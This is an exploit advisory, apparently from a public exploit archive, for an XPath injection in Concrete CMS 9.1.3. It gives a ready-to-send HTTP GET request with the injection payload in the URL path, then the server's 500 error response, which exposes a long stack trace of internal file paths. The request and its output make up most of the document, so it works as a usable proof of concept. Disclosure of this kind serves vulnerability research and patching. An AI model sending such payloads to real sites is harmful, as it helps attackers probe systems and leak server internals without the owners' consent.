## Exploit Title: Concrete5 CME v9.1.3 - Xpath injection
## Author: nu11secur1ty
## Date: 11.28.2022
## Vendor: https://www.concretecms.org/
## Software: https://www.concretecms.org/download
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3

## Description:
The URL path folder `3` appears to be vulnerable to XPath injection attacks.
The test payload 50539478' or 4591=4591-- was submitted in the URL
path folder `3`, and an XPath error message was returned.
The attacker can flood with requests the system by using this
vulnerability to untilted he receives the actual paths of the all
content of this system which content is stored on some internal or
external server.

## STATUS: HIGH Vulnerability

[+] Exploits:
00:
```GET
GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```

[+] Response:

```HTTP
HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Nov 2022 15:32:22 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 592153

<!DOCTYPE html><!--


Whoops\Exception\ErrorException: include(): Failed opening
&#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php&#039;
for inclusion (include_path=&#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR&#039;)
in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php
on line 26
Stack trace:
  1. Whoops\Exception\ErrorException->()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
  2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
  3. Stash\Driver\FileSystem\NativeEncoder->deserialize()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201
  4. Stash\Driver\FileSystem->getData()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631
  5. Stash\Item->getRecord()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321
  6. Stash\Item->executeGet()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252
  7. Stash\Item->get()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346
  8. Stash\Item->isMiss()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67
  9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356
 10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601
 11. Laminas\I18n\Translator\Translator->loadMessages()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434
 12. Laminas\I18n\Translator\Translator->getTranslatedMessage()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349
 13. Laminas\I18n\Translator\Translator->translate()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69
 14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27
 15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47
 16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267
 17. Concrete\Core\Block\View\BlockView->renderViewContents()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
 18. Concrete\Core\View\AbstractView->render()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853
 19. Concrete\Core\Area\Area->display()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128
 20. Concrete\Core\Area\GlobalArea->display()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11
 21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125
 22. Concrete\Core\View\View->inc()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4
 23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329
 24. Concrete\Core\View\View->renderTemplate()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291
 25. Concrete\Core\View\View->renderViewContents()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
 26. Concrete\Core\View\AbstractView->render()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19
 27. Concrete\Controller\SinglePage\PageNotFound->view()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
 28. call_user_func_array()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
 29. Concrete\Core\Controller\AbstractController->runAction()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188
 30. Concrete\Core\Http\ResponseFactory->controller()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95
 31. Concrete\Core\Http\ResponseFactory->notFound()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390
 32. Concrete\Core\Http\ResponseFactory->collectionNotFound()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234
 33. Concrete\Core\Http\ResponseFactory->collection()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132
 34. Concrete\Core\Http\DefaultDispatcher->handleDispatch()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60
 35. Concrete\Core\Http\DefaultDispatcher->dispatch()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39
 36. Concrete\Core\Http\Middleware\DispatcherDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39
 37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
 38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36
 39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
 40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36
 41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
 42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35
 43. Concrete\Core\Http\Middleware\CookieMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
 44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29
 45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
 46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86
 47. Concrete\Core\Http\Middleware\MiddlewareStack->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85
 48. Concrete\Core\Http\DefaultServer->handleRequest()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125
 49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102
 50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45
 51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2


--><html>
  <head>
    <meta charset="utf-8">
    <meta name="robots" content="noindex,nofollow"/>
    <meta name="viewport" content="width=device-width,
initial-scale=1, shrink-to-fit=no"/>
    <title>Concrete CMS has encountered an issue.</title>

    <style>body {
  font: 12px "Helvetica Neue", helvetica, arial, sans-serif;
  color: #131313;
  background: #eeeeee;
  padding:0;
  margin: 0;
  max-height: 100%;

  text-rendering: optimizeLegibility;
}
  a {
    text-decoration: none;
  }

.Whoops.container {
    position: relative;
    z-index: 9999999999;
}

.panel {
    overflow-y: scroll;
    height: 100%;
    position: fixed;
    margin: 0;
    left: 0;
    top: 0;
}

.branding {
  position: absolute;
  top: 10px;
  right: 20px;
  color: #777777;
  font-size: 10px;
    z-index: 100;
}
  .branding a {
    color: #e95353;
  }

header {
  color: white;
  box-sizing: border-box;
  background-color: #2a2a2a;
  padding: 35px 40px;
  max-height: 180px;
  overflow: hidden;
  transition: 0.5s;
}

  header.header-expand {
    max-height: 1000px;
  }

  .exc-title {
    margin: 0;
    color: #bebebe;
    font-size: 14px;
  }
    .exc-title-primary, .exc-title-secondary {
      color: #e95353;
    }

    .exc-message {
      font-size: 20px;
      word-wrap: break-word;
      margin: 4px 0 0 0;
      color: white;
    }
      .exc-message span {
        display: block;
      }
      .exc-message-empty-notice {
        color: #a29d9d;
        font-weight: 300;
      }

.......

```


## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)

## Proof and Exploit:
[href](https://streamable.com/4f60ka)

## Time spent
`03:00:00`


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>